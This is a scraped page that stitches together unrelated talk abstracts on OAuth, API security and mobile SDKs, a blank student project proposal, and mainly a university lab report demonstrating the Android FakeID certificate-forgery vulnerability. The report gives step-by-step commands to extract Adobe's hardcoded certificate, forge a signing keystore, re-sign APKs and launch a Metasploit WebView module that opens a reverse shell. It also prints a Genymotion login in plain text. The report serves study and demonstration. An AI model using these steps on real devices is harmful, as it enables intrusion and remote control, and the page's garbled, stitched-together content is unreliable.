This document summarizes a student project that demonstrated the Android FakeID vulnerability. The vulnerability allows an attacker to modify the certificate of a malicious app so that it claims to have been signed by a trusted certificate authority; because early Android did not cryptographically verify that claim, the OS granted the app additional permissions. The students created two apps: one that could open websites, and another that could request that websites be opened. By default, the request was denied due to insufficient permissions. However, after the certificate of the second app was modified to reference the first app's certificate, the OS granted the necessary permissions and allowed the website request, demonstrating the vulnerability. This showed how an attacker could exploit the lack of certificate verification in early Android to gain unauthorized access.
In May's Microsoft identity platform call, Navya Canumalla went into detail on MSAL Java and Python, including an overview, supported scenarios and calling patterns, a quickstart demo, the token cache and ADAL to MSAL migration.
View recording https://youtu.be/yCCjNqFva9w
Resources:
MSAL Java https://aka.ms/msaljavadocs
MSAL Python https://aka.ms/msalpythondocs
Stay connected
Twitter https://twitter.com/microsoft365dev
YouTube https://aka.ms/M365DevYouTube
Blogs https://aka.ms/M365DevBlog
OWASP’s Latest Category: API Underprotection - LF_APIStrat17
OWASP’s 2017 top ten adds a new category called 'underprotected APIs', reflecting the growth of RESTful Web APIs and richer front-end clients which stress current security and access authorization approaches. You’ll learn about potential threats resulting from undersecured Web APIs and techniques to strengthen your API security posture. You'll gain a clear understanding of user authorization via OAuth2, software authorization via static API keys and the critical interplay between them. Of particular concern are mobile API consumers whose code is statically published with secrets which are often poorly concealed. Practical advice with code examples will show how to improve mobile API security. TLS is necessary but insufficient to fully secure client-server communications. Certificate pinning is explained with code examples to show how to strengthen channel communications. Some advanced techniques will be discussed such as app hardening, white box cryptography and mobile app attestation. You should gain a good understanding of the underprotected API problem, with some immediately practical tips to improve your API security posture and a sense of emerging tools and technologies that enable a significant step change in API security.
Mobile Single Sign-On: OAuth 2.0, OpenID Connect, NAAPS, why doesn’t anything work and can we do better? -- Brian Campbell, Ping Identity. Mobile computing has grown at an unprecedented rate in recent years while innovations in identity and Single Sign-On on mobile have lagged behind. We'll look at the state of native mobile application SSO including applicable standards such as OAuth 2.0, OpenID Connect, and NAAPS, and try to better understand the bigger picture of what's happening and what might be done to improve things.
-- from 2015 http://gluecon.com/
The Liferay case: lessons learned evolving from RPC to Hypermedia REST APIs - Jorge Ferrer
Liferay is an open source platform started in 2000, long before the term “Web API” existed. One early characteristic of Liferay has been its great extensibility, which included providing a featureful HTTP API to access its functionality from the very beginning. Initially this API used SOAP (as well as other, less used protocols). Later a new “RESTful” option was added, leveraging HTTP+JSON, and it became much more popular (even though it was at Level 0 in the Richardson Maturity Model). However, both approaches led users of the API into tight coupling that makes evolving the APIs a challenging task. So we started wondering: isn’t there a better way to build APIs in 2017?
This session explains our search to find a better alternative and what we learned along the way.
It focuses on how we have adopted Hypermedia and Shared Vocabularies to create a new breed of APIs that we believe form the secret ingredients that solve the most important challenge we have in the API Economy: evolvability. We are now successfully applying this type of APIs in all of our products, on premise, cloud based, … even internal.
We have found that once you know how and build some common foundation, all the barriers to build evolvable APIs disappear. We learned from many others along the way and want to contribute back by sharing our experience.
IBM Index Conference - 10 steps to build token based API Security - Senthilkumar Gopal
"10 steps to build token based API Security" is a presentation about building robust token systems for protecting APIs. This was presented as part of Index Conference.
Ever wonder how a large iOS software product is architected, developed and maintained? Wouldn’t it be neat to see the insides of a working iOS application to get ideas on how to solve your own problems? WordPress for iOS might be exactly what you’re looking for.
WordPress for iOS has been in the Apple App Store since 2008. It is a huge codebase with a lot of contributors. The application is entirely open source, which lets you explore how it has been architected and how each piece works.
In this session you will learn about how WordPress for iOS is developed, the thought that went into the architecture, how a large dev team works with it and also specifics about the implementation in Xcode. You should be able to walk away from this talk with an understanding of how the app works enough to start contributing code for bug fixes and new features.
Talk given at 360iDev 2015 in Denver, CO USA.
ReactJS Vs React Native: Understanding Differences, Advantages, Disadvantages - Techtic Solutions
Here's an in-depth comparison of ReactJS vs React Native which will help you understand the differences, advantages and disadvantages. Meanwhile, Techtic Solutions is a top-notch ReactJS and React Native app development company with 10+ years of web development experience. Our teams of experienced ReactJS and React Native app developers are adept at building everything from simple to the most complex web apps. Get in touch if you are looking to hire ReactJS and React Native developers to deliver secure, high-performance and faster web applications. Call us at +1 201.793.8324 or visit us at https://www.techtic.com/react-native-app-development/
The workshop will also provide a thorough guide on how the mobile applications can be attacked and provide an overview of how some of the most important security checks for the applications are applied and get an in-depth understanding of these security checks.
Course Content:
Android Introduction & Basics
Setting up the Pen testing environment
Reverse engineering & runtime manipulation
Application dynamic runtime analysis
Application Components and security issues
Data and Network interception – manipulation and analysis
Defensive Tools & Techniques for Android application
Goes through 7 scenarios where a fictional developer Bob chooses ways to achieve them that work, but have some flaws in them. Must-have knowledge for any developer working with Azure Active Directory.
Building an SSO platform in PHP (Zendcon 2010) - Ivo Jansch
A presentation explaining how to build Single Sign On functionality in PHP using standards such as OpenID, OAuth and SAML. Delivered on November 4, 2010 at Zendcon in Santa Clara.
Updated version of my PHP in a mobile ecosystem talk. Looks at how PHP plays a role in the mobile world, and explains what PHP developers need to know about mobile development.
Presentation delivered at the PHPBenelux 2011 conference and the PHP UK conference 2011.
Best Practices for Application Development with Box - Jonathan LeBlanc
Covering the best practices for building new applications on top of Box platform, including token management, error condition and program flow, architecture, and other such topics.
Every mobile marketer has heard the acronym “SDK” bandied about in discussions with their product and customer support teams. But how many marketers have actually asked: ”What does SDK stand for?”
To shed light on the SDK meaning as well as to understand how a mobile SDK can benefit your app, check out this SlideShare!
HOMO SAPIENS or HOMO BRUTUS: HUMAN ONTOLOGY: On the Essence of Human Beings - Azamat Abdoullaev
HOMO SAPIENS as HOMO BRUTUS
Humanity = Monstrous Animality
Man is the only animal whose community is led by mediocrities or abnormalities
FROM HUMANITY 1.0 to HUMANITY X.0
“14,500 wars have taken place between 3500 BC and the late 20th century, costing 3.5 billion lives, leaving only 300 years of peace”
CIS13: Taking the Hyperspace Bypass: Controlling User Access to Other Worlds - CloudIDSummit
Dale Olds, Senior Staff Engineer, VMware
If identity is the new perimeter, then users must be able to access applications anywhere: on premise, in the cloud or on partner sites. To enable this access we must take identity information into other worlds, and there is no Babel Fish. This session will explain how to enable access to distributed applications without making users feel like Marvin the Paranoid Android. We will cover topics like federated authentication, browser single sign-on and delegated authorization for cloud APIs. Standards in this area are essential, but SAML, OAuth2, SCIM and OpenID can sound like Vogon poetry. We'll touch on the standards, but keep the Vogon poetry to a minimum.
OAuth 2.0 and Mobile Devices: Is that a token in your phone in your pocket or... - Brian Campbell
Gluecon 2012 presentation on using OAuth 2.0 with mobile applications to utilize social logins. "Is that a token in your phone in your pocket or are you just glad to see me? OAuth 2.0 and Mobile Devices"
An iOS Code Signing Certificate is a must-have for iOS developers to ensure the integrity of software code, applications, .exe, etc. Easy guide on iOS code signing security.
Remote Exploitation of the Dropbox SDK for Android - IBM Security
The IBM X-Force Application Security Research Team has discovered a vulnerability in the Dropbox SDK for Android (CVE-2014-8889) which allows attackers to connect applications on mobile devices to a Dropbox account controlled by the attacker without the victim's knowledge or authorization. This is a serious flaw in the authentication mechanism within any Android app using Dropbox SDK versions 1.5.4 through 1.6.1.
Conference Android Application: Software Reengineering Project Document
SWE400-1402B-01 Software Construction
1st June 2014
Project Proposal
· Approved
· Not Approved
Sr.#   Student ID   Student Name   *Signature
1      ID           Name1
2      ID 2         Name 2
3
*The candidates confirm that the work submitted is their own and appropriate credit has been given where reference has been made to work of others.
Supervisor Name: ____________________
Designation: ____________________
Signature: ____________________
Co-Supervisor Name: ____________________
Designation: ____________________
Signature: ____________________
Abstract
The My Conference Android application is used to book meetings between attendees at conferences and seminars. Attendees can book meetings with other users in the conference. Attendees have to register in the application.
Introduction
The My Conference application is used by different seminars and conferences to help attendees book meetings with each other. Attendees need to be registered in the application. Registered users can log in and see the other registered attendees, including their name, company and details, and can book meetings with them. The other attendee will see who has booked a meeting with him. Meetings are booked with a meeting name, meeting details and a time. The application sends its requests to a Java server (a J2EE project), which processes them against a MySQL database and sends the response back to the application.
Application has the following modules to be made:
1. Registration
2. Sending password to Email
3. Attendees list display
4. Book Meetings
5. Database management
Motivation and Scope
The My Conference Android application streamlines the meeting appointment process of traditional systems. It replaces the manual meeting booking system, which consumes time, and removes the delays of manual booking. It allows users to check other users' company names and designations before meeting. No special arrangements are needed to set up a meeting.
System Architecture
Our system will be based on the Java web and mobile platforms.
Goals and Objectives
The goals and objectives of our project are:
· To optimize the meeting appointment process at conferences.
· To be simple and user friendly.
· To be a paperless, web-based system that can be accessed from anywhere.
· To use new technologies and tools to make it efficient.
Future Work
We are building the conference application in such a way that it can be extended with modules other than meetings that are required at a conference. For example, along with meeting appointments we could extend it to hold meetings via video conferencing.
Tools and Technologies
The tools and technologies which will be used are:
· Android Platform.
· J2EE based server
· MySQL server
· My SQL workbench
· Eclipse for Android
· Eclipse (J2EE enabled) for java server
· Tomcat server apache-tomcat-7.0.30 to run serv.
Mobile API Test With Web Proxy
At Haptik we build mobile apps for Android and iOS for customer support. We have also built SDKs which can be plugged into any other app in the market, which lets those apps use Haptik chatbots inside them. The SDK handles storage, networking, computation, user messages, responses returned via API calls, and more.
Mobile API testing
This is a kind of software testing that exercises application programming interfaces directly, and as part of integration testing, for functionality, performance and security.
Proxy server
A proxy server is a server that acts as a gateway between a client, for example a browser, and the actual web server. It makes requests to the actual server on behalf of the client, or sometimes fulfils the request itself. Proxies are used to control internet access, for privacy, to reach blocked sites, for security, and for speed and bandwidth savings. In our app we use web sockets to send and receive messages, make numerous API requests for various capabilities, and much more. To find problems in our app and make the end-user experience better we wanted to test different situations such as poor network connectivity, web sockets under load, slow third-party API responses, etc.
Test web sockets & APIs
The proxy's throttle feature adjusts the bandwidth and latency of the network. This lets us simulate slower connection types rather than a high-speed WiFi network, and so test the app's behaviour on poor network connections. Testing on poor network connections is the most important scenario for a chatbot-style app whose functionality requires the user to be notified without delay.
For example, a user receives a personalised message or a personalised call to remind him/her about an event. We wanted to check what happens during network latency or interruptions and how the app handles it, and we were able to test all of this using the network throttle feature.
Federation Evolved: How Cloud, Mobile & APIs Change the Way We Broker Identity - CA API Management
Understanding how emerging standards like OAuth and OpenID Connect impact federation
Federation is a critical technology for reconciling user identity across Web applications. Now that users consume the same data through cloud and mobile, federation infrastructure must adapt to enable these new channels while maintaining security and providing a consistent user experience.
This webinar will examine the differences between identity federation across Web, cloud and mobile, look at API specific use cases and explore the impact of emerging federation standards.
You Will Learn
Best practices for federating identity across mobile and cloud
How emerging identity federation standards will impact your infrastructure
How to implement an identity-centric API security and management infrastructure
Presenters
Ehud Amiri
Director, Product Management, CA Technologies
Francois Lascelles
Chief Architect, Layer 7
A Code Signing Certificate is a digital signature technology that allows authorized software publishers to sign their software code, scripts and content to authenticate their identity over the internet.
Quickly Build a Native Mobile App for Your Community Using Salesforce Mobile SDK - Salesforce Developers
Join us to learn how to take a Visualforce-based community you built for the browser and convert it into a native app by using Salesforce Mobile SDK. You can then submit this native app into Apple's App store or Google Play without learning Objective-C or Android.
Android FakeID Vulnerability
Final Project Report
High Level Description:
Group: 3
Members: Mark Laubender, Scott Weiss, Hao Hu, Zack Webster, Brett Kaplan
Project Type: Conference Talk
Project Specifics: Android FakeID Vulnerability - a vulnerability in Android OS version 4.3 and earlier where the operating system does not cryptographically verify the issuer signatures in an app's certificate chain, allowing an attacker to modify the self-signed certificate of a malicious program so that it claims to have been issued by a trusted certificate authority, and to have the OS accept that claim.
References
BlueBox Security Blog:
https://bluebox.com/technical/android-fake-id-vulnerability/
https://bluebox.com/technical/questioning-the-chain-of-trust-investigations-into-the-root-certificates-on-mobile-devices/
The BlueBox Security blog posts explained the vulnerability in more detail than the conference talk.
Jeff Forristal:
jeff@bluebox.com
Mr. Forristal was contacted at the beginning of our project and, while he did not give us many answers, he gave valuable background on the workings of this vulnerability.
Android
Xref: http://androidxref.com/4.3_r2.1/xref/frameworks/base/core/java/android/webkit/PluginManager.java
Line 77 of the Android Xref contains a hardcoded copy of an Adobe certificate. Without this certificate there would be nothing for us to sign another APK with.
Video Presentation Slides:
https://www.blackhat.com/docs/us-14/materials/us-14-Forristal-Android-FakeID-Vulnerability-Walkthrough.pdf
The video presentation slides were used as a reference, especially in changing the certificate of an APK.
Stack Overflow:
http://stackoverflow.com/questions/12456453/is-it-possible-to-generate-correct-pkcs12-pfx-file-in-python
Stack Overflow was invaluable to our group when we were altering our APK's certificate, and this Python script served as our model in creating our own.
http://stackoverflow.com/questions/22211140/conversion-x-509-certificate-represented-as-a-hex-string-into-pem-encoded-x-509
With the help of Stack Overflow we found an openssl command that allowed us to convert the hard-coded Adobe certificate (a hex string in the source) to an actual certificate file (PEM format) which we could wrap with our own certificate.
https://cyberarms.wordpress.com/2014/02/26/android-webview-exploit-tutorial-70-of-devices-vulnerable/
An exploit we used in the malware we crafted to demonstrate the FakeID vulnerability
http://stackoverflow.com/questions/9293019/get-certificate-fingerprint-from-android-app
Info on how to write a program that checks certificates at runtime. This allowed us to demonstrate the FakeID vulnerability using our own exploit (since we were unable to recreate the Adobe Plugin Manager exploit).
Technical Content:
The focus of this vulnerability is Public Key Infrastructure (PKI); specifically, public certificates and the chaining of self-signed certificates. Under the PKI paradigm, a certificate's contents are hashed with a message digest algorithm and the digest is signed with the issuer's private key to form the certificate's signature; anyone holding the issuer's public key can check that signature and so detect any change to the certificate. Prior to KitKat (v4.4), Android did not perform this check when building an app's certificate chain. This means that anyone with the know-how could modify a certificate without the change being noticed.
Each certificate carries the signature of its issuer, the Certificate Authority (CA) or other entity which issued it. Operating systems and web browsers keep a set of implicitly trusted issuers, and some Android components hard-code the certificates of specific vendors; e.g., the Adobe certificate in the WebView PluginManager referenced above. When the operating system finds such a trusted certificate in an app's chain, it treats the app as though it had been signed by that trusted party and grants it privileges reserved for that party's apps. For example, this means that any program whose chain contains the Adobe certificate is granted the privileges the system reserves for Adobe's own plugin code, which the original exploit used to inject code into other apps installed on the device.
Each certificate has an ‘issuer’ field which refers to another certificate, indicating that the Certificate
Authority (CA) behind that parent certificate also issued this one. This allows long series of certificates
to be chained together under a single Certificate Authority; such certificate chains are common in PKI
architecture. When an operating system or web browser encounters a certificate, it must process the entire
certificate chain to determine whether the chain ends in a trusted Certificate Authority and, from that,
what permissions the certificate is valid for.
Android platforms predating KitKat (v4.4) did not check the cryptographic validity of self-signed
certificates, meaning that a certificate could be modified, breaking its cryptography, without the system
treating its signature as invalid. When checking the CA of a certificate, Android simply scanned the
certificate chain for a trusted CA and stopped there. It was therefore possible for an attacker to generate a
self-signed certificate for a malicious app, modify it to claim it was issued by a trusted CA, and then
obtain permissions for that app from the OS which are reserved for apps genuinely signed by the trusted
CA.
Jeff Forristal’s Blackhat 2014 presentation demonstrated an exploit which disguised itself as an update for
Adobe apps using a Webview Plugin. By signing a malicious app with a cert modified to make it look like
it was issued by Adobe, Forristal demonstrated that the app was given permission by the OS to update
Adobe apps, which allowed him to inject code into apps installed on the device that would open a reverse
shell.
Our implementation used a similar vector to demonstrate the FakeID vulnerability. Because we were
unable to craft an app which injected code into real Adobe apps, we instead emulated restricted
permissions by creating our own exploitable app, which opens a website given to it by another app,
provided that app has the correct permission to do so. The ‘victim’ app compares the signature of the
exploit app to a hardcoded signature (the same way that the Adobe Plugin Manager checks the signature of
Jeff’s malicious ‘update’), leaving the responsibility of ensuring the cryptography of the certificate to
Android. If the exploit app is not signed with the proper signature, it will not have permission to
communicate with the victim app.
After creating both the victim app (that opens a website) and the exploit app (that sends the website
address and the command to open it), we generated separate self-signed certs for both apps. If, at this
point, both apps are installed on the device, the victim app is run, and then the exploit app is run and
used to send the website to the victim app, the victim app will reply with the message ‘invalid
permissions’. However, if we modify the exploit app’s cert using a simple python script to reference the
vulnerable app’s cert as its issuer and upload the exploit app to the device, the vulnerable app will
recognize it as having the correct permissions. Like the Adobe exploit, the responsibility for verifying the
cert’s cryptography is left to the OS.
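The two checks contrasted above (a chain scan that only matches the issuer name, versus a check that verifies each signature with the issuer's public key), together with the defence the victim app's hardcoded-signature comparison relies on, can be shown side by side. The following is an added example written for this write-up; it is not part of the student project files or of Android. It uses the Python 'cryptography' package, constructs a trusted CA, an honest certificate and a forged one (self-signed, with the issuer field edited to name the CA) inline, and the function and variable names are all assumptions of the example.

```python
"""Added example, not part of the student report or its project files.
Models (1) the name-only chain scan described above, (2) a proper
signature-verified issuer check, and (3) pinning the full signing
certificate by hash, which is what an app like the 'victim' app should
compare against. Keys and certificates are constructed inline."""
import datetime
import hashlib

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID


def _name(common_name):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])


def build_cert(subject, issuer, subject_key, signing_key):
    """Certificate whose issuer field names `issuer` and whose signature is
    made with `signing_key`. Honest: signing_key is the issuer's key.
    Forged: signing_key is the subject's own key (self-signed)."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return (
        x509.CertificateBuilder()
        .subject_name(_name(subject))
        .issuer_name(_name(issuer))
        .public_key(subject_key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=365))
        .sign(signing_key, hashes.SHA256())
    )


def issuer_name_only_check(leaf, trusted_cas):
    """Flawed check: accept if the issuer *name* matches a trusted CA,
    without ever verifying the signature (the pre-4.4 behaviour described)."""
    return any(leaf.issuer == ca.subject for ca in trusted_cas)


def verified_issuer_check(leaf, trusted_cas):
    """Correct check: the matching CA's public key must verify the
    signature over the leaf's to-be-signed bytes."""
    for ca in trusted_cas:
        if leaf.issuer != ca.subject:
            continue
        try:
            ca.public_key().verify(
                leaf.signature,
                leaf.tbs_certificate_bytes,
                padding.PKCS1v15(),
                leaf.signature_hash_algorithm,
            )
            return True
        except InvalidSignature:
            return False
    return False


def fingerprint(cert):
    """SHA-256 over the DER-encoded certificate: the value an app should pin."""
    return hashlib.sha256(cert.public_bytes(serialization.Encoding.DER)).hexdigest()


def pinned_signer_check(leaf, pinned_sha256):
    """Defence for the victim app: compare the whole signing certificate
    against a pinned hash, so a cert that merely names a trusted issuer fails."""
    return fingerprint(leaf) == pinned_sha256


def demo():
    ca_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    ca = build_cert("Trusted CA", "Trusted CA", ca_key, ca_key)

    honest_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    honest = build_cert("honest-app", "Trusted CA", honest_key, ca_key)

    # Self-signed, issuer field pointing at the CA: the shape described above.
    forged_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    forged = build_cert("malicious-app", "Trusted CA", forged_key, forged_key)

    trusted = [ca]
    pinned = fingerprint(honest)
    return {
        "honest_name_only": issuer_name_only_check(honest, trusted),
        "forged_name_only": issuer_name_only_check(forged, trusted),
        "honest_verified": verified_issuer_check(honest, trusted),
        "forged_verified": verified_issuer_check(forged, trusted),
        "honest_pinned": pinned_signer_check(honest, pinned),
        "forged_pinned": pinned_signer_check(forged, pinned),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The name-only scan accepts both certificates, which is the behaviour the report exploits; the signature-verified check and the pinned-fingerprint check each reject the forged one. The fingerprint comparison is the cheaper defence for an app that only needs to recognise one specific signer, because it does not depend on the platform having walked the chain correctly.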
Limitations:
Our original intent was to craft the same exploit that the FakeID conference talk demonstrated. We
originally misunderstood how Jeff was able to run an exploit app that opened a reverse shell without
asking for any permissions from the device. We thought this was because Android has hard-coded
permissions for trusted CAs that it automatically grants to apps when it recognizes a trusted CA in the
certificate chain when an app is installed. While it is true that Android does have hard-coded permissions
for trusted CAs, the permission Jeff’s exploit used was not internet access permission or access to SMS,
email, etc. that a reverse shell would require. Instead, it was the permission to modify code in Adobe apps
already installed on the device, i.e. the permission to update Adobe apps via the web.
We were successful in signing our cert with Adobe’s signature, but doing so gave us no practical exploit
to demonstrate. It was beyond our knowledge and understanding to write an app that can modify the
binary of another app (it may require a complex knowledge of how the target apps actually work in order
to forge an update for them). We spent time trying to reverse engineer the binary of an actual Adobe flash
player update. We unpacked the apk and decompiled the class files within and spent some time trying to
figure out how we could add arbitrary code for execution into the flash player through the update. But
even getting the decompiled code to compile was extremely difficult and eventually proved to be a dead
end.
We had no way to actually demonstrate that we now had permission to update Adobe apps because we
couldn’t create the app to inject code in the first place. Instead, we switched focus to demonstrating
the concept at work in this vulnerability. We created our own target app, that, instead of
receiving an ‘update’ by having its binary modified, simply receives a string and attempts to open it up as
a URL. We mimicked Adobe Plugin Manager’s method for verifying the signature of the update app,
which hard-coded Adobe’s public signature and string matched it against the signature of the update app.
So long as the self-signed certificate of the exploit app is modified to point to the certificate of the victim
app as its issuer, it is able to pass the string and command the victim app to open the URL. If the cert is
not modified, then the user is notified that they do not have appropriate permissions and the URL is not
opened.
Materials
Materials needed to run:
project files attached:
o workingCertSign.py
o CheckCert eclipse project
o Exploit eclipse project
A way to compile Android apk's:
o we used eclipse IDE with the latest version of ADT and Android SDK
1. visit the page http://developer.android.com/sdk/installing/index.html?pkg=adt
and follow the link to download the Eclipse ADT bundle
2. Unpack the ZIP file (named adt-bundle-{os_platform}.zip) and save it to an
appropriate location, such as a "Development" directory in your home directory.
3. Open the adt-bundle-{os_platform}/eclipse/ directory and launch Eclipse.
4. Caution: Do not move any of the files or directories from the adt-bundle-
{os_platform} directory. If you move the eclipse/ or sdk/ directory, ADT will not be
able to locate the SDK and you'll need to manually update the ADT preferences.
A way to run Android applications:
o we used Genymotion (Oracle VirtualBox must be installed)
1. visit the page https://cloud.genymotion.com/page/launchpad/download/ and
download the correct version of Genymotion
2. if you are prompted for a username/password you may use “mlaubend”/“ec521”
3. run the following commands:
chmod +x {Genymotion installer path}/genymotion-{version}_{arch}.bin
cd
./genymotion-{version}_{arch}.bin -d {Genymotion installer path}
4. run Genymotion using the following command
cd {Genymotion installer path}
./genymotion
5. Note: make sure that the dkms package is installed and that it
compiles VirtualBox kernel modules each time a new kernel update is available.
To do so, run
Android Debug Bridge (ADB)
o You can find the adb tool in {sdk}/platform-tools/
Instructions to run:
extracting the adobe certificate from Xref:
navigate to line 77 of the Android Xref
o http://androidxref.com/4.3_r2.1/xref/frameworks/base/core/java/android/webkit/PluginManager.java
copy the hex-string into a text file and run the following command
o cat {your text file}.txt | xxd -r -p | openssl x509 -inform DER -out adobeCert.pem -outform PEM
a new file adobeCert.pem should appear in your directory
creating the keystore from an Adobe certificate:
make sure the attached python script workingCertSign.py and adobeCert.pem are in the same
directory
navigate to the directory and run the python script
o python workingCertSign.py
the new file container.pfx should appear in your directory
now run the following command to create a keystore from the container.pfx file
o keytool -v -importkeystore -srckeystore container.pfx -srcstoretype PKCS12 -destkeystore my.keystore -deststoretype JKS
input the new destination keystore password 123456
input the source keystore password 1234
the new file my.keystore should appear in your directory
starting the metasploit server
open a terminal in kali linux and type msfconsole
when the metasploit framework has loaded, type the following command
o use exploit/android/browser/webview_addjavascriptinterface
now insert the following commands to configure your metasploit server
o set URIPATH Security
o set LHOST {your kali ipaddr}
o exploit
the metasploit server should now start
building the apps:
run eclipse and import the provided directories CheckCert and Exploit into two separate Android
projects
o file → import → existing projects into workspace
o select one of the provided directories as root directory and click finish
line 32 in CheckCert must be modified. Replace the IP address shown with your own kali IP
follow the steps to export both projects into apk's
o file → export → Export Android Application
o select one of the two projects when prompted
o select Create new keystore
select a location directory (irrelevant) and keystore name (irrelevant)
select a password (irrelevant)
o input the required forms in the Key Creation menu (irrelevant)
o input the directory holding your my.keystore as the Destination for the APK file
deleting default certificate in Exploit.apk:
once the apk's have been exported, the Exploit.apk certificate must be removed before a new one
can be written
o the easiest way to do this is to rename Exploit.apk to Exploit.zip
o open Exploit.zip with archive manager and delete the META-INF directory
o rename Exploit.zip to Exploit.apk
use my.keystore to sign the apk using the following command
o jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my.keystore Exploit.apk 1
o Passphrase for keystore: 123456
o key password for 1: 1234
NOTE: as part of our demonstration, do not remove the default certificate in CheckCert.apk
installing and running on the Android virtual device:
start genymotion
o cd {Genymotion installer path}
o ./genymotion
click add to create a new Android virtual device
sign in using the genymotion credentials above and select Google Galaxy Nexus -4.1.1 – API 16
select your new virtual device and click start
use adb to push both apk's to the Android emulator
o ensure adb can see the emulator
adb devices
o adb push Exploit.apk /sdcard/Download
o adb push CheckCert.apk /sdcard/Download
in your android virtual device, use the file manager application to navigate to /sdcard/Download
click on Exploit.apk to install it, but do not run it (must be installed first)
o note the permissions (network access)
click on CheckCert.apk to install it and run it
o note the permissions (none!)
o if asked, use Exploit as the service to open
CheckCert.apk will attempt to send a web address to Exploit, but will be denied due to inadequate
permissions
be sure to click “refresh” in Exploit before continuing
gaining extra permissions through certificate manipulation
delete CheckCert from the virtual device by dragging and dropping into the uninstall folder
on your desktop navigate to the directory containing the original CheckCert.apk
rename CheckCert.apk to CheckCert.zip
open CheckCert.zip with archive manager and delete the META-INF directory
rename CheckCert.zip to CheckCert.apk
use my.keystore to sign the apk using the following command
o jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my.keystore CheckCert.apk 1
o Passphrase for keystore: 123456
o key password for 1: 1234
use adb to push CheckCert.apk to the Android emulator
o adb push CheckCert.apk /sdcard/Download
in your android emulator, use the file manager application to navigate to /sdcard/Download
click on CheckCert.apk to install it and run it
o if asked, use Exploit as the service to open
CheckCert.apk will gain the extra permissions given to it from the new certificate and successfully
send a web address to Exploit
the web address will use the addjavascriptinterface exploit from the metasploit framework to open
a reverse shell from the Emulator to your kali machine
o in your metasploit terminal type the following commands to open the reverse shell
sessions -i 1
sysinfo
o note the operating system information (Android 4.1.1)
Live exercise:
Explanation:
Our live exercise will consist of a demonstration of the FakeID vulnerability. One app (app1) was
crafted that shows websites in a WebView, and another app (app2) was crafted to send websites to app1,
which accepts them only if app2 has the proper permissions. We will show that app1 will not open the
website given to it by app2. We will then sign app2 with the proper certificate, which makes app2 inherit
the permissions associated with that certificate. We will then show that app1 now opens the website given
to it by app2, emphasizing that no cryptographic checking was involved and no permissions were
consciously granted to app2.
Setup:
Our group will need access to the projector and an HDMI cable connected to the projector.